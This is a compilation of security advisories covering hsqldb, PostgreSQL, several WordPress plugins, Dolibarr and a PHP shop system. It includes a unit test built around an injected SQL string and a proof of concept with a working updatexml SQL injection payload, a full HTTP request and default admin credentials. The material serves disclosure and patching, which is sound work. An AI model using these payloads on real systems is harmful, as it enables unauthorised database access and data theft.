An update for hsqldb is now available for Red Hat Enterprise Linux 6 Extended Lifecycle Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-41853: hsqldb: Untrusted input may lead to RCE attack


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-11-21

Updated:

2022-11-21

**RHSA-2022:8559 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: hsqldb security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for hsqldb is now available for Red Hat Enterprise Linux 6 Extended Lifecycle Support.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

The hsqldb packages provide a relational database management system written in Java. The Hyper Structured Query Language Database (HSQLDB) contains a JDBC driver to support a subset of ANSI-92 SQL.  

Security Fix(es):  

*   hsqldb: Untrusted input may lead to RCE attack (CVE-2022-41853)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux Server - Extended Life Cycle Support 6 x86\_64
*   Red Hat Enterprise Linux Server - Extended Life Cycle Support 6 i386
*   Red Hat Enterprise Linux Server - Extended Life Cycle Support (for IBM z Systems) 6 s390x

**Fixes**

*   BZ - 2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack

**Red Hat Enterprise Linux Server - Extended Life Cycle Support 6**

SRPM

hsqldb-1.8.0.10-13.el6\_10.src.rpm

SHA-256: e084580fea183639ff15bf8809e19f9fb04fed15a758e3c6431d4a71da1c3350

x86\_64

hsqldb-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: e61bdba1a6b4c12dc4c9a09fad66c7d7327b31114ec403e758c55ab03cb28872

hsqldb-demo-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: 72a9cf2213638c79dceb57622a6b3a89d03afca09adb5aca34b9e16340c799b2

hsqldb-javadoc-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: 3af4fe2f9b3797feda9177699c2048c89600a8c5c894a138d9912970d12999f9

hsqldb-manual-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: c3fda043c491b835671646c6ccc4b6b015437cf1279d8030f1b52158af55b9db

i386

hsqldb-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: e61bdba1a6b4c12dc4c9a09fad66c7d7327b31114ec403e758c55ab03cb28872

hsqldb-demo-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: 72a9cf2213638c79dceb57622a6b3a89d03afca09adb5aca34b9e16340c799b2

hsqldb-javadoc-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: 3af4fe2f9b3797feda9177699c2048c89600a8c5c894a138d9912970d12999f9

hsqldb-manual-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: c3fda043c491b835671646c6ccc4b6b015437cf1279d8030f1b52158af55b9db

**Red Hat Enterprise Linux Server - Extended Life Cycle Support (for IBM z Systems) 6**

SRPM

hsqldb-1.8.0.10-13.el6\_10.src.rpm

SHA-256: e084580fea183639ff15bf8809e19f9fb04fed15a758e3c6431d4a71da1c3350

s390x

hsqldb-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: e61bdba1a6b4c12dc4c9a09fad66c7d7327b31114ec403e758c55ab03cb28872

hsqldb-demo-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: 72a9cf2213638c79dceb57622a6b3a89d03afca09adb5aca34b9e16340c799b2

hsqldb-javadoc-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: 3af4fe2f9b3797feda9177699c2048c89600a8c5c894a138d9912970d12999f9

hsqldb-manual-1.8.0.10-13.el6\_10.noarch.rpm

SHA-256: c3fda043c491b835671646c6ccc4b6b015437cf1279d8030f1b52158af55b9db

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:8559: Red Hat Security Advisory: hsqldb security update

Gentoo Linux Security Advisory 202211-4 - Multiple vulnerabilities have been found in PostgreSQL, the worst of which could result in remote code execution. Versions greater than or equal to 10.22:10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                          https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: High  
   Title: PostgreSQL: Multiple Vulnerabilities  
    Date: November 19, 2022  
    Bugs: #793734, #808984, #823125, #865255  
      ID: 202211-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in PostgreSQL, the worst of  
which could result in remote code execution.

Background  
==========

PostgreSQL is an open source object-relational database management  
system.

Affected packages  
=================

-------------------------------------------------------------------  
Package              /     Vulnerable     /            Unaffected  
-------------------------------------------------------------------  
dev-db/postgresql    < 10.22                >= 10.22:10  
                                 < 11.17:11           >= 11.17:11  
                                 < 12.12:12           >= 12.12:12  
                                 < 13.8:13             >= 13.8:13  
                                 < 14.5:14             >= 14.5

Description  
===========

Multiple vulnerabilities have been discovered in PostgreSQL. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All PostgreSQL 10.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-10.22:10"

All PostgreSQL 11.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-11.17:11"

All PostgreSQL 12.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-12.12:12"

All PostgreSQL 13.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-13.8:13"

All PostgreSQL 14.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-14.5:14"

References  
==========

[ 1 ] CVE-2021-3677  
     https://nvd.nist.gov/vuln/detail/CVE-2021-3677  
[ 2 ] CVE-2021-23214  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23214  
[ 3 ] CVE-2021-23222  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23222  
[ 4 ] CVE-2021-32027  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32027  
[ 5 ] CVE-2021-32028  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32028  
[ 6 ] CVE-2022-1552  
     https://nvd.nist.gov/vuln/detail/CVE-2022-1552  
[ 7 ] CVE-2022-2625  
     https://nvd.nist.gov/vuln/detail/CVE-2022-2625

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

https://security.gentoo.org/glsa/202211-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-04

The Event Monster WordPress plugin before 1.2.0 does not validate and escape some parameters before using them in SQL statements, which could lead to SQL Injection exploitable by high privilege users

CVE-2022-3720

The My wpdb WordPress plugin before 2.5 is missing CSRF check when running SQL queries, which could allow attacker to make a logged in admin run arbitrary SQL query via a CSRF attack

CVE-2022-1578

SQL injection attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period. This affect 16.0.1 and 16.0.2 only. 16.0.0 or lower, and 16.0.3 or higher are not affected

@@ -0,0 +1,178 @@ <?php /\* Copyright (C) 2010 Laurent Destailleur <eldy@users.sourceforge.net> \* \* This program is free software; you can redistribute it and/or modify \* it under the terms of the GNU General Public License as published by \* the Free Software Foundation; either version 3 of the License, or \* (at your option) any later version. \* \* This program is distributed in the hope that it will be useful, \* but WITHOUT ANY WARRANTY; without even the implied warranty of \* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \* GNU General Public License for more details. \* \* You should have received a copy of the GNU General Public License \* along with this program. If not, see <https://www.gnu.org/licenses/>. \* or see https://www.gnu.org/ \*/  
/\*\* \* \\file test/phpunit/WebsiteTest.php \* \\ingroup test \* \\brief PHPUnit test \* \\remarks To run this script as CLI: phpunit filename.php \*/  
global $conf,$user,$langs,$db; //define('TEST\_DB\_FORCE\_TYPE','mysql'); // This is to force using mysql driver //require\_once 'PHPUnit/Autoload.php';  
if (! defined('NOREQUIRESOC')) { define('NOREQUIRESOC', '1'); } if (! defined('NOCSRFCHECK')) { define('NOCSRFCHECK', '1'); } if (! defined('NOTOKENRENEWAL')) { define('NOTOKENRENEWAL', '1'); } if (! defined('NOREQUIREMENU')) { define('NOREQUIREMENU', '1'); // If there is no menu to show } if (! defined('NOREQUIREHTML')) { define('NOREQUIREHTML', '1'); // If we don't need to load the html.form.class.php } if (! defined('NOREQUIREAJAX')) { define('NOREQUIREAJAX', '1'); } if (! defined("NOLOGIN")) { define("NOLOGIN", '1'); // If this page is public (can be called outside logged session) } if (! defined("NOSESSION")) { define("NOSESSION", '1'); }  
require\_once dirname(\_\_FILE\_\_).'/../../htdocs/main.inc.php'; require\_once dirname(\_\_FILE\_\_).'/../../htdocs/core/lib/website.lib.php';  
  
if (empty($user\->id)) { print "Load permissions for admin user nb 1\\n"; $user\->fetch(1); $user\->getrights(); } $conf\->global\->MAIN\_DISABLE\_ALL\_MAILS\=1;  
  
/\*\* \* Class for PHPUnit tests \* \* @backupGlobals disabled \* @backupStaticAttributes enabled \* @remarks backupGlobals must be disabled to have db,conf,user and lang not erased. \*/ class WebsiteTest extends PHPUnit\\Framework\\TestCase { protected $savconf; protected $savuser; protected $savlangs; protected $savdb;  
/\*\* \* Constructor \* We save global variables into local variables \* \* @return SecurityTest \*/ public function \_\_construct() { parent::\_\_construct();  
//$this->sharedFixture global $conf,$user,$langs,$db; $this\->savconf\=$conf; $this\->savuser\=$user; $this\->savlangs\=$langs; $this\->savdb\=$db;  
print \_\_METHOD\_\_." db->type=".$db\->type." user->id=".$user\->id; //print " - db ".$db->db; print "\\n"; }  
/\*\* \* setUpBeforeClass \* \* @return void \*/ public static function setUpBeforeClass() { global $conf,$user,$langs,$db; $db\->begin(); // This is to have all actions inside a transaction even if test launched without suite.  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* tearDownAfterClass \* \* @return void \*/ public static function tearDownAfterClass() { global $conf,$user,$langs,$db; $db\->rollback();  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* Init phpunit tests \* \* @return void \*/ protected function setUp() { global $conf,$user,$langs,$db; $conf\=$this\->savconf; $user\=$this\->savuser; $langs\=$this\->savlangs; $db\=$this\->savdb;  
print \_\_METHOD\_\_."\\n"; }  
/\*\* \* End phpunit tests \* \* @return void \*/ protected function tearDown() { print \_\_METHOD\_\_."\\n"; }  
  
/\*\* \* testGetPagesFromSearchCriterias \* \* @return void \*/ public function testGetPagesFromSearchCriterias() { global $db;  
$s = "123') OR 1=1-- \\' xxx"; /\* var\_dump($s); var\_dump($db->escapeforlike($s)); var\_dump($db->escape($db->escapeforlike($s))); \*/  
$res = getPagesFromSearchCriterias('page,blogpost', 'meta,content', $s, 2, 'date\_creation', 'DESC', 'en'); //var\_dump($res); print \_\_METHOD\_\_." message=".$res\['code'\]."\\n"; // We must found no line (so code should be KO). If we found somethiing, it means there is a SQL injection of the 1=1 $this\->assertEquals($res\['code'\], 'KO'); } }

CVE-2022-4093: Fix sqli ->escape after ->escapeforlike · Dolibarr/dolibarr@7c1eac9

Block BYPASS vulnerability in iQ Block Country plugin <= 1.2.18 on WordPress.

CVE-2022-41155: iQ Block Country

Auth. (subscriber+) Insecure Direct Object References (IDOR) vulnerability in Comments – wpDiscuz plugin 7.4.2 on WordPress.

CVE-2022-43492: Comments – wpDiscuz

Arbitrary Code Execution vulnerability in Api2Cart Bridge Connector plugin <= 1.1.0 on WordPress.

 Verified

 Fixed

**10**

CVSS 3.1 score Critical severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 1.1.0

PSID 

e8ae40303ceb

Classification 

SQL Injection

OWASP Top 10 

A1: Injection

Required privilege 

Can be exploited remotely without any authentication.

Publicly disclosed

2022-10-28

**Details**

Arbitrary Code Execution vulnerability discovered by Dave Jong (Patchstack) in the WordPress Api2Cart Bridge Connector plugin (versions <= 1.1.0).

**Solution**

Update the WordPress Api2Cart Bridge Connector plugin to the latest available version (at least 1.2.0).

**References**

CVE-2022-42497: WordPress Api2Cart Bridge Connector plugin <= 1.1.0 - Arbitrary Code Execution vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Media Library Folders plugin <= 7.1.1 on WordPress.

CVE-2022-41634: Media Library Folders

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/mechanics/manage_mechanic.php?id=.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: huchengrong

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/mechanics/manage\_mechanic.php?id=

Vulnerability location: /asms/admin/mechanics/manage\_mechanic.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/mechanics/manage\_mechanic.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/mechanics/manage\_mechanic.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

Tag

#sql